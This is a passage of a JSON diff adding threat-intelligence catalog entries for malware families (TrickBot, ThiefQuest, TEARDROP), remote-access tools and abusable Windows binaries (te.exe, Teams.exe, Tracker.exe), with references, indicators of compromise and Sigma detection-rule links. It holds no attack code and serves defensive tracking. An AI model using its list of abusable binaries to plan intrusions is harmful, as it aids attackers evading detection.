"e7116740-fe7c-45e2-b98d-0c594a7dff2f", + "value": "TDTESS" + }, + { + "description": "[[te.exe - LOLBAS Project](/references/e7329381-319e-4dcc-8187-92882e6f2e12)]", + "meta": { + "id": "d4bd9095-2288-4092-a689-1c2bc6c8ed25", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "8eef4e4b-e294-47bb-befa-9cd97ceced57", + "type": "similar" + } + ], + "uuid": "7f9ba4e5-1bea-4620-855c-b9cf9e97da07", + "value": "te.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* no default\n\n**Resources:**\n* [https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg](https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg)\n\n**Detection:**\n* Sigma: [proc_creation_win_susp_use_of_te_bin.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml)[[te.exe - LOLBAS Project](/references/e7329381-319e-4dcc-8187-92882e6f2e12)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5239", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "7f9ba4e5-1bea-4620-855c-b9cf9e97da07", + "type": "similar" + } + ], + "uuid": "8eef4e4b-e294-47bb-befa-9cd97ceced57", + "value": "te" + }, + { + "description": "[[Teams.exe - LOLBAS Project](/references/ceee2b13-331f-4019-9c27-af0ce8b25414)]", + "meta": { + "id": "3f59bae3-2ebe-46d4-97dd-4e56572cd130", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "13221a7b-6c23-48a7-97bd-21e2c689a391", + "type": "similar" + } + ], + "uuid": "386539ac-dcd7-4484-9dcb-3e4aa849fd7c", + "value": "Teams.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Electron runtime binary which runs the Teams application\n\n**Author:** Andrew Kisliakov\n\n**Paths:**\n* %LOCALAPPDATA%\\Microsoft\\Teams\\current\\Teams.exe\n\n**Resources:**\n* [https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/](https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/)\n\n**Detection:**\n* IOC: %LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created\n* IOC: %LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater\n* Sigma: [proc_creation_win_susp_electron_exeuction_proxy.yml](https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml)[[Teams.exe - LOLBAS Project](/references/ceee2b13-331f-4019-9c27-af0ce8b25414)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5240", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "386539ac-dcd7-4484-9dcb-3e4aa849fd7c", + "type": "similar" + } + ], + "uuid": "13221a7b-6c23-48a7-97bd-21e2c689a391", + "value": "Teams" + }, + { + "description": "TeamViewer is a tool used to enable remote connections to network devices for support and administration.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5010", + "source": "Tidal Cyber", + "tags": [ + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "15b77e5c-2285-434d-9719-73c14beba8bd", + "e727eaa6-ef41-4965-b93a-8ad0c51d0236" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "0060bb76-6713-4942-a4c0-d4ae01ec2866", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "4a4641b1-7686-49da-8d83-00d8013f4b47", + "type": "used-by" + }, + { + "dest-uuid": "666ab5f0-3ef1-4e74-8a10-65c60a7d1acd", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "used-by" + }, + { + "dest-uuid": "72d9bea7-9ca1-43e6-8702-2fb7fb1355de", + "type": "used-by" + }, + { + "dest-uuid": "4bdc62c9-af6a-4377-8431-58a6f39235dd", + "type": "used-by" + } + ], + "uuid": "6b5f6eb4-4cdd-4383-8623-d1f7de486865", + "value": "TeamViewer" + }, + { + "description": "[TEARDROP](https://app.tidalcyber.com/software/bae20f59-469c-451c-b4ca-70a9a04a1574) is a memory-only dropper that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a). It was likely used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least May 2020.[[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)][[Microsoft Deep Dive Solorigate January 2021](https://app.tidalcyber.com/references/ddd70eef-ab94-45a9-af43-c396c9e3fbc6)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0560", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "32f49626-87f4-4d6c-8f59-a0dca953fe26", + "type": "similar" + } + ], + "uuid": "bae20f59-469c-451c-b4ca-70a9a04a1574", + "value": "TEARDROP" + }, + { + "description": "Teleport is a custom tool for data exfiltration. It has been observed in use during intrusions involving Truebot, a botnet and loader malware, in 2022 and 2023.[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5011", + "source": "Tidal Cyber", + "tags": [ + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "8bf128ad-288b-41bc-904f-093f4fdde745" + ], + "type": "malware" + }, + "related": [], + "uuid": "b9a98499-c984-4199-ae64-d1381ebbaa1f", + "value": "Teleport" + }, + { + "description": "[[TestWindowRemoteAgent.exe - LOLBAS Project](/references/0cc891bc-692c-4a52-9985-39ddb434294d)]", + "meta": { + "id": "c5f2f005-8e6e-4f0a-8f15-532e40fca1a7", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "2143f749-d7b8-43c0-8041-8aeb486142c2", + "type": "similar" + } + ], + "uuid": "fcf88411-e0c2-403a-aa70-dc75fd1d488b", + "value": "TestWindowRemoteAgent.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** TestWindowRemoteAgent.exe is the command-line tool to establish RPC\n\n**Author:** Onat Uzunyayla\n\n**Paths:**\n* C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\RemoteAgent\\TestWindowRemoteAgent.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* IOC: TestWindowRemoteAgent.exe spawning unexpectedly[[TestWindowRemoteAgent.exe - LOLBAS Project](/references/0cc891bc-692c-4a52-9985-39ddb434294d)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5241", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "fcf88411-e0c2-403a-aa70-dc75fd1d488b", + "type": "similar" + } + ], + "uuid": "2143f749-d7b8-43c0-8041-8aeb486142c2", + "value": "TestWindowRemoteAgent" + }, + { + "description": "Based on similar descriptions of functionality, it appears S0146, as named by FireEye, is the same as Stage 4 of a backdoor named DNSMessenger by Cisco's Talos Intelligence Group. However, FireEye appears to break DNSMessenger into two parts: S0145 and S0146. [[Cisco DNSMessenger March 2017](https://app.tidalcyber.com/references/49f22ba2-5aca-4204-858e-c2499a7050ae)] [[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]", + "meta": { + "id": "1b0ec06d-0748-42ea-912f-e23f14d94b95" + }, + "related": [ + { + "dest-uuid": "49d0ae81-d51b-4534-b1e0-08371a47ef79", + "type": "similar" + } + ], + "uuid": "6812793e-6342-4da6-b77f-ed29fab1fd9a", + "value": "DNSMessenger" + }, + { + "description": "[TEXTMATE](https://app.tidalcyber.com/software/49d0ae81-d51b-4534-b1e0-08371a47ef79) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://app.tidalcyber.com/software/a4700431-6578-489f-9782-52e394277296) in February 2017. [[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0146", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "4f6aa78c-c3d4-4883-9840-96ca2f5d6d47", + "type": "similar" + }, + { + "dest-uuid": "6812793e-6342-4da6-b77f-ed29fab1fd9a", + "type": "similar" + } + ], + "uuid": "49d0ae81-d51b-4534-b1e0-08371a47ef79", + "value": "TEXTMATE" + }, + { + "description": "[[Reed thiefquest fake ransom](https://app.tidalcyber.com/references/b265ef93-c1fb-440d-a9e0-89cf25a3de05)]", + "meta": { + "id": "d10f0e4b-613c-4eca-8119-51837c58ba99" + }, + "related": [ + { + "dest-uuid": "2ed5f691-68eb-49dd-b730-793dc8a7d134", + "type": "similar" + } + ], + "uuid": "6161f604-0972-427e-802e-b5ac009b94fe", + "value": "EvilQuest" + }, + { + "description": "[[SentinelOne EvilQuest Ransomware Spyware 2020](https://app.tidalcyber.com/references/4dc26c77-d0ce-4836-a4cc-0490b6d7f115)]", + "meta": { + "id": "cf6ccd95-6883-4dfb-bebf-c4c387a702c9" + }, + "related": [ + { + "dest-uuid": "2ed5f691-68eb-49dd-b730-793dc8a7d134", + "type": "similar" + } + ], + "uuid": "6979dd37-4c1c-48bf-a0e1-c8f2a0606962", + "value": "MacRansom.K" + }, + { + "description": "[ThiefQuest](https://app.tidalcyber.com/software/2ed5f691-68eb-49dd-b730-793dc8a7d134) is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. [ThiefQuest](https://app.tidalcyber.com/software/2ed5f691-68eb-49dd-b730-793dc8a7d134) was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.[[Reed thiefquest fake ransom](https://app.tidalcyber.com/references/b265ef93-c1fb-440d-a9e0-89cf25a3de05)] Even though [ThiefQuest](https://app.tidalcyber.com/software/2ed5f691-68eb-49dd-b730-793dc8a7d134) presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.[[wardle evilquest partii](https://app.tidalcyber.com/references/4fee237c-c2ec-47f5-b382-ec6bd4779281)][[reed thiefquest ransomware analysis](https://app.tidalcyber.com/references/47b49df4-34f1-4a89-9983-e8bc19aadf8c)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0595", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172", + "2e621fc5-dea4-4cb9-987e-305845986cd3" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "727afb95-3d0f-4451-b297-362a43909923", + "type": "similar" + }, + { + "dest-uuid": "6161f604-0972-427e-802e-b5ac009b94fe", + "type": "similar" + }, + { + "dest-uuid": "6979dd37-4c1c-48bf-a0e1-c8f2a0606962", + "type": "similar" + } + ], + "uuid": "2ed5f691-68eb-49dd-b730-793dc8a7d134", + "value": "ThiefQuest" + }, + { + "description": "[ThreatNeedle](https://app.tidalcyber.com/software/b31c7b8e-dbdd-4ad5-802e-dcdc72b7462e) is a backdoor that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08)'s Manuscrypt (a.k.a. NukeSped) malware family.[[Kaspersky ThreatNeedle Feb 2021](https://app.tidalcyber.com/references/ba6a5fcc-9391-42c0-8b90-57b729525f41)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0665", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "16040b1c-ed28-4850-9d8f-bb8b81c42092", + "type": "similar" + } + ], + "uuid": "b31c7b8e-dbdd-4ad5-802e-dcdc72b7462e", + "value": "ThreatNeedle" + }, + { + "description": "ThunderShell is a tool used to facilitate remote access via HTTP requests.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5045", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "8fe38eda-30be-4c88-ae76-ac6ebc89d66b", + "value": "ThunderShell" + }, + { + "description": "According to its project page, TightVNC is a free and open-source remote desktop software tool that is Virtual Network Computing (VNC)-compatible. It is designed to enable remote access to other systems.[[TightVNC Software Project Page](/references/e1725230-4f6c-47c5-8e30-90dfb01a75d7)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S5015", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "e727eaa6-ef41-4965-b93a-8ad0c51d0236" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "7094468a-2310-48b5-ad24-e669152bd66d", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + } + ], + "uuid": "6b0d5be9-5305-4b45-bed9-43dee66b85e8", + "value": "TightVNC" + }, + { + "description": "[TinyTurla](https://app.tidalcyber.com/software/39f0371c-b755-4655-a97e-82a572f2fae4) is a backdoor that has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) against targets in the US, Germany, and Afghanistan since at least 2020.[[Talos TinyTurla September 2021](https://app.tidalcyber.com/references/94cdbd73-a31a-4ec3-aa36-de3ea077c1c7)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0668", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "2a7c1bb7-cd12-456e-810d-ab3bf8457bab", + "type": "similar" + } + ], + "uuid": "39f0371c-b755-4655-a97e-82a572f2fae4", + "value": "TinyTurla" + }, + { + "description": "[TINYTYPHON](https://app.tidalcyber.com/software/0e009cb8-848e-427a-9581-d3a4fd9f6a87) is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. [[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]", + "meta": { + "platforms": [], + "software_attack_id": "S0131", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "type": "used-by" + }, + { + "dest-uuid": "85b39628-204a-48d2-b377-ec368cbcb7ca", + "type": "similar" + } + ], + "uuid": "0e009cb8-848e-427a-9581-d3a4fd9f6a87", + "value": "TINYTYPHON" + }, + { + "description": "[TinyZBot](https://app.tidalcyber.com/software/277290fe-51f3-4822-bb46-8b69fd1c8ae5) is a bot written in C# that was developed by [Cleaver](https://app.tidalcyber.com/groups/c8cc6ce8-d421-42e6-a6eb-2ea9d2d9ab07). [[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0004", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c8cc6ce8-d421-42e6-a6eb-2ea9d2d9ab07", + "type": "used-by" + }, + { + "dest-uuid": "c0c45d38-fe57-4cd4-b2b2-9ecd0ddd4ca9", + "type": "similar" + } + ], + "uuid": "277290fe-51f3-4822-bb46-8b69fd1c8ae5", + "value": "TinyZBot" + }, + { + "description": "[Tomiris](https://app.tidalcyber.com/software/eff417ad-c775-4a95-9f36-a1b5a675ba82) is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between [Tomiris](https://app.tidalcyber.com/software/eff417ad-c775-4a95-9f36-a1b5a675ba82) and [GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6).[[Kaspersky Tomiris Sep 2021](https://app.tidalcyber.com/references/a881a7e4-a1df-4ad2-b67f-ef03caddb721)]", + "meta": { + "platforms": [], + "software_attack_id": "S0671", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "327b3a25-9e60-4431-b3b6-93b9c64eacbc", + "type": "similar" + } + ], + "uuid": "eff417ad-c775-4a95-9f36-a1b5a675ba82", + "value": "Tomiris" + }, + { + "description": "[Tor](https://app.tidalcyber.com/software/8c70d85b-b06d-423c-8bab-ecff18f332d6) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://app.tidalcyber.com/software/8c70d85b-b06d-423c-8bab-ecff18f332d6) utilizes \"Onion Routing,\" in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. [[Dingledine Tor The Second-Generation Onion Router](https://app.tidalcyber.com/references/ffb6a26d-2da9-4cce-bb2d-5280e9cc16b4)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0183", + "source": "MITRE", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "393da13e-016c-41a3-9d89-b33173adecbf", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + }, + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68", + "type": "similar" + } + ], + "uuid": "8c70d85b-b06d-423c-8bab-ecff18f332d6", + "value": "Tor" + }, + { + "description": "[Torisma](https://app.tidalcyber.com/software/4bce135b-91ba-45ae-88f9-09e01f983a74) is a second stage implant designed for specialized monitoring that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). [Torisma](https://app.tidalcyber.com/software/4bce135b-91ba-45ae-88f9-09e01f983a74) was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.[[McAfee Lazarus Nov 2020](https://app.tidalcyber.com/references/a283d229-3a2a-43ef-bcbe-aa6d41098b51)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0678", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0715560d-4299-4e84-9e20-6e80ab57e4f2", + "type": "similar" + } + ], + "uuid": "4bce135b-91ba-45ae-88f9-09e01f983a74", + "value": "Torisma" + }, + { + "description": "[[LOLBAS Tracker](/references/f0e368f1-3347-41ef-91fb-995c3cb07707)]", + "meta": { + "id": "02b85713-d721-4948-95a6-91a636ddc49a", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "62ebde4b-4936-49f6-842b-8c0313ea26f5", + "type": "similar" + } + ], + "uuid": "5ad5e21b-789e-4b4e-92d3-377140d7274a", + "value": "Tracker.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Tool included with Microsoft .Net Framework.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* no default\n\n**Resources:**\n* [https://twitter.com/subTee/status/793151392185589760](https://twitter.com/subTee/status/793151392185589760)\n* [https://attack.mitre.org/wiki/Execution](https://attack.mitre.org/wiki/Execution)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_tracker.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml)[[LOLBAS Tracker](/references/f0e368f1-3347-41ef-91fb-995c3cb07707)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5242", + "source": "Tidal Cyber", + "tags": [ + "3c9b26cf-9bda-4feb-ab42-ef7865cc80fd", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5ad5e21b-789e-4b4e-92d3-377140d7274a", + "type": "similar" + } + ], + "uuid": "62ebde4b-4936-49f6-842b-8c0313ea26f5", + "value": "Tracker" + }, + { + "description": "[TrailBlazer](https://app.tidalcyber.com/software/7a6ae9f8-5f8b-4e94-8716-d8ee82027197) is a modular malware that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2019.[[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0682", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "bdad6f3b-de88-42fa-9295-d29b5271808e", + "type": "similar" + } + ], + "uuid": "7a6ae9f8-5f8b-4e94-8716-d8ee82027197", + "value": "TrailBlazer" + }, + { + "description": "[[Trend Micro Totbrick Oct 2016](https://app.tidalcyber.com/references/d6419764-f203-4089-8b38-860c442238e7)]", + "meta": { + "id": "5ff9588f-51e1-4e65-957b-d7331a1e8e1b" + }, + "related": [ + { + "dest-uuid": "c2bd4213-fc7b-474f-b5a0-28145b07c51d", + "type": "similar" + } + ], + "uuid": "4a8dc24e-e942-46f3-8026-91c1ed059bbb", + "value": "TSPY_TRICKLOAD" + }, + { + "description": "[[Trend Micro Totbrick Oct 2016](https://app.tidalcyber.com/references/d6419764-f203-4089-8b38-860c442238e7)] [[Microsoft Totbrick Oct 2017](https://app.tidalcyber.com/references/3abe861b-0e3b-458a-98cf-38450058b4a5)]", + "meta": { + "id": "fd5c3f7d-a11a-405f-bac5-fb4017edef1b" + }, + "related": [ + { + "dest-uuid": "c2bd4213-fc7b-474f-b5a0-28145b07c51d", + "type": "similar" + } + ], + "uuid": "aabae1a3-d831-46f4-a65f-ab31f03fd687", + "value": "Totbrick" + }, + { + "description": "[TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to [Dyre](https://app.tidalcyber.com/software/38e012f7-fb3a-4250-a129-92da3a488724). [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) was developed and initially used by [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of \"big game hunting\" ransomware campaigns.[[S2 Grupo TrickBot June 2017](https://app.tidalcyber.com/references/28faff77-3e68-4f5c-974d-dc7c9d06ce5e)][[Fidelis TrickBot Oct 2016](https://app.tidalcyber.com/references/839c02d1-58ec-4e25-a981-0276dbb1acc8)][[IBM TrickBot Nov 2016](https://app.tidalcyber.com/references/092aec63-aea0-4bc9-9c05-add89b4233ff)][[CrowdStrike Wizard Spider October 2020](https://app.tidalcyber.com/references/5c8d67ea-63bc-4765-b6f6-49fa5210abe6)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0266", + "source": "MITRE", + "tags": [ + "e809d252-12cc-494d-94f5-954c49eb87ce" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "00806466-754d-44ea-ad6f-0caf59cb8556", + "type": "similar" + }, + { + "dest-uuid": "4a8dc24e-e942-46f3-8026-91c1ed059bbb", + "type": "similar" + }, + { + "dest-uuid": "aabae1a3-d831-46f4-a65f-ab31f03fd687", + "type": "similar" + } + ], + "uuid": "c2bd4213-fc7b-474f-b5a0-28145b07c51d", + "value": "TrickBot" + }, + { + "description": "[[Secureworks Karagany July 2019](https://app.tidalcyber.com/references/61c05edf-24aa-4399-8cdf-01d27f6595a1)]", + "meta": { + "id": "25984079-3d11-4cee-ad8c-af969f8552a8" + }, + "related": [ + { + "dest-uuid": "b88c4891-40da-4832-ba42-6c6acd455bd1", + "type": "similar" + } + ], + "uuid": "e8b885ae-4bf3-42c0-8b9e-a410c08eb441", + "value": "xFrost" + }, + { 